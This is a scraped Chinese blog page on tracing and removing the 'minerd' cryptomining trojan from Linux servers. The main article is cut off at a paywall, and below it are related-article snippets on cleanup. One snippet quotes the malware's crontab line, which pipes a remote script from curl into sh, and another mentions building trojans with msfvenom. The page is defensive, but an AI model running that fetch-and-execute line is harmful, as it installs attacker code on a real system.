minerd肉鸡木马排查思路

最新推荐文章于 2022-09-07 20:06:04 发布
最新推荐文章于 2022-09-07 20:06:04 发布
阅读量524 收藏
点赞数
分类专栏: 阿里云工作经验 百度云工作经验 linux运维 文章标签: linux 运维 云服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_15856897/article/details/107668414
版权

Linux主机肉鸡木马minerd导致CPU跑满

【问题现象】

Linux主机CPU跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。

【问题原因】

这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较高。在这里插入图片描述
经定位,该进程是一个挖矿程序,通过上述截图可以看到进程对应的PID为1170,根据进程ID查询一下产生进程的程序路径

执行ll /proc/ P I D / e x e , 其 中 PID/exe,其中

最低0.47元/天 解锁文章
自律才能更自由
关注
专栏目录
一次 minerd 肉鸡木马排查思路
weixin_43770745的博客
08-29 1004
备注:根据 ps 查询结果显示 minerd 有向域名 xmr.crypto-pool.fr 进行数据通信,通过 ping 测试域名解析核实此域名对应的 IP 地址,然后在 ip.taobao.com 进行查询显示 IP 为法国的 IP,然后通过 iftop -i eth1 -PB 命令对流量进行了监控,确实存在向法国的 IP 发送数据的情况,为了避免再次被入侵,可以通过 iptables 屏蔽对应的异常 IP(具体的 IP 和域名要根据实际查询的情况而定,可能会有所不同)。...
如何检查自己的电脑是不是中了肉鸡木马
04-24 2833
<!-- alimama_pid="mm_10249644_1605763_4929893"; alimama_titlecolor="707070"; alimama_descolor ="CCCCCC"; alimama_bgcolor="FFFFFF"; alimama_bordercolor="FFFFFF"; alimama_linkcolor="DADA
minerd
weixin_30852451的博客
01-20 95
今天top服务器,发现minerd占用很高cpu,百度发现此进程是用来挖掘莱特币,清除过程查看: http://www.tuicool.com/articles/FVZfuy ...
minerd木马处理流程
王孙小蛮的自留地
07-27 928
首先说一句,这木马太恶心了,卧槽 首先在服务器发现minerd 程序ps -rf|grep minerd然后发现crontab 定时任务根据这个地址看看攻击脚本,我就不分析了,大致是获取系统权限等等首先删除生成的秘钥然后暂停定时任务暂停服务删除/opt/minerd 文件记住这里有个坑,此时已经暂停掉任务了但是那个进程还在,我特么就奇怪了,可能出现的原因是已经进入定时任务后,暂定这个服务但是任务还
Linux主机肉鸡木马minerd导致CPU跑满
chepei9387的博客
06-22 161
摘要:Linux主机肉鸡木马minerd导致CPU跑满 【问题现象】 Linux主机CPU跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。 【问题原因】 这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较高。 Linux主机肉鸡木马minerd...
linux和windows木马排查思路
qq_40770143的博客
10-23 2375
一般常见的黑客入侵途径 1、主机远程连接端口暴露在互联网并存在弱口令,被黑客暴力破解后获取主机权限。 2、主机部署数据库后连接端口暴露互联网,数据库账号弱口令,被黑客入侵数据后提权获取主机权限。 3、部署业务存在应用漏洞,被黑客利用植入webshell,控制主机。 一、windows系统排查木马处理流程: 1、procexp.exe 开启virtual在线查杀,发现木马进程。 2、procexp....
服务器肉鸡/入侵被恶意利用的排查和优化方案
yunhan0609的博客
07-05 1203
排查方法: 1.账户方面: Windows: (1) 检查服务器内是否有异常的账户,查看下服务器内是否有非系统和用户本身创建的账户,一般黑客创建的账户账户名 后会有$这个字符,有此类账户存在,请立即禁用或者删除掉; (2) 黑客也可能在您服务器内创建隐藏用户,隐藏账户在本地用户内是查看不到的,您可以在服务器内点击开始-运行-输入 regedt32.exe,依次选择HKEY_LOCAL_MACHIN...
kali linux肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统
weixin_42309178的博客
05-02 1513
一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。二、步骤:Step1:生成木马,msfvenommsfve...
Linux服务器中木马肉鸡)手工清除方法
wuyongde0922的专栏
05-24 4916
0,简单判断有无木马 有无下列文件 cat /etc/rc.d/init.d/selinux cat /etc/rc.d/init.d/DbSecuritySpt ls /usr/bin/bsd-port  ls /usr/bin/dpkgd 查看大小是否正常 ls -lh /bin/netstat ls -lh /bin/ps ls -lh
CentOS 服务器因 Redis 遭遇挖矿程序 minerd 入侵事件记录
Dancen的专栏
07-18 3541
事件经过: 周六早上监控服务器发送报警,连续多次无法建立与一台应用服务器的连接。 情况紧急,登录时发现该应用服务器并没有崩溃。 执行: ps -ef | grep nginx 结果显示相关服务还健在。 执行: uptime 发现,服务器的负载非常高。 执行: top 发现,有一个叫做minerd的进程占用了几乎所有cpu资源。 百度“centos minerd”,搜索结果显
一次服务器被挖矿木马攻击的经历
Lisong_jack的博客
06-11 619
基本情况介绍: 使用TOP命令,查看所有进程占用资源情况,发现存在一个进程,占用大量CPU资源和内存资源。进入/proc/<PID>目录下,看到该进程的命令来源于/tmp下。使用kill -9 <PID> 命令杀死该进程之后,一会又有新的进程产生,依然占用大量CPU。 于是猜想可能存在定时任务或者其守护进程。使用systemctl status ...
minerd解决随记
Show something
09-28 346
万恶的minerd挖矿木马,手段很高明,彻底根治比较难,先写个定时脚本压制下。核心命令ps -ef|grep "./minerd"|awk '{print $2}'|xargs kill修改定时任务# Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # |
minerd.exe 处理
weixin_30457551的博客
02-13 590
:top TASKKILL /F /IM "minerd.exe" Goto top and then searching the file system for minerd.exe. Next, search Windows Registry for any reference to minerd.exe or the file location of that executable. C...
记录阿里云服务器minerd和kworkerds感染作祟,
逐浪青舟的博客
09-03 7704
2018-09-01周五阿里云云盾通知检测到服务器有异常文件下载,当时没太注意,执行下面操作解决问题(简单针对于minerd处理) 1、执行 top -i命令查看cpu 使用总过高,使用top -l 查看到是minerd作祟, 2、果断ps -ef | grep ‘minerd’查看pid, 3、使用kill -9 程序的pid 杀死掉, 4、到 cd /tmp/下...
win10系统错误:Mineud.exe-系统措误 ,无法启动此程序,因为计算机中丢失iUtils.dll。尝试重新安装该程序以解决此问题。
guyuelin123的博客
09-07 2万+
邻居电脑一直开机就弹出se qing 弹窗,电脑本身安装了腾讯管家,通过管家杀毒、弹窗设置后,还是不能出来。后续有安装了火绒通过杀毒和弹窗设置后,开机没有在弹出se qing 弹窗,但是有提示 Mineud.exe-系统措误 ,无法启动此程序,因为计算机中丢失iUtils.dll,尝试重新安装该程序以解决此问题。
windowns 安装tomcat的服务
Hu_wen的专栏
01-17 259
环境:   windows: 2008   tomcat :7.0.39 Ctrl+R 进入命令行模式 cd 到 apache-tomcat -7.0.39/bin 目录下 然后执行:serivice.bat install [服务名] 服务器需参照service.bat 文件中的 set SERVICE_NAME=Tomcat7 然后就可以通过服务启动tomcat7
Linux清除木马minerd
骆驼大笨笨
08-02 9937
minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]
阿里云服务器被挖矿程序minerd入侵的终极解决办法
热门推荐
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值